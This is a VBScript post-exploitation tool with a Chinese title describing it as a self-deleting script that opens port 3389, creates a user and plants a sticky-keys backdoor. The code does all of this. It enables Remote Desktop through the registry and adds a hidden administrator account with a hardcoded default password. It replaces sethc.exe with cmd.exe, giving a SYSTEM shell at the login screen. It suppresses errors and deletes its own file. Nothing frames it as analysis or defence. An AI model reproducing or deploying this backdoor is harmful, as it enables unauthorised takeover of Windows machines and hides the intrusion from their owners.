可自删除 开启3389创建用户粘滞键后门的vbs

on error resume next
const hkey_local_machine = &h80000002
strcomputer = "."
set stdout = wscript.stdout
set oreg=getobject("winmgmts:{impersonationlevel=impersonate}!\\" &_
strcomputer & "\root\default:stdregprov")
strkeypath = "system\currentcontrolset\control\terminal server"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"
oreg.createkey hkey_local_machine,strkeypath
strkeypath = "system\currentcontrolset\control\terminal server\winstations\rdp-tcp"
strkeypath = "system\currentcontrolset\control\terminal server"
strvaluename = "fdenytsconnections"
dwvalue = 0
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
strkeypath = "system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp"
strvaluename = "portnumber"
dwvalue = 3389
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
strkeypath = "system\currentcontrolset\control\terminal server\winstations\rdp-tcp"
strvaluename = "portnumber"
dwvalue = 3389
oreg.setdwordvalue hkey_local_machine,strkeypath,strvaluename,dwvalue
on error resume next
dim username,password:if wscript.arguments.count then:username=wscript.arguments(0):password=wscript.arguments(1):else:username="wykgif":password="wykgif123456":end if:set wsnetwork=createobject("wscript.network"):os="winnt://"&wsnetwork.computername:set ob=getobject(os):set oe=getobject(os&"/administrators,group"):set od=ob.create("user",username):od.setpassword password:od.setinfo:set of=getobject(os&"/"&username&",user"):oe.add(of.adspath)'wscript.echo of.adspath
on error resume next
dim obj, success
set obj = createobject("wscript.shell")
success = obj.run("cmd /c takeown /f %systemroot%\system32\sethc.exe&echo y| cacls %systemroot%\system32\sethc.exe /g %username%:f&copy %systemroot%\system32\cmd.exe %systemroot%\system32\acmd.exe&copy %systemroot%\system32\sethc.exe %systemroot%\system32\asethc.exe&del %systemroot%\system32\sethc.exe&ren %systemroot%\system32\acmd.exe sethc.exe", 0, true)
createobject("scripting.filesystemobject").deletefile(wscript.scriptname)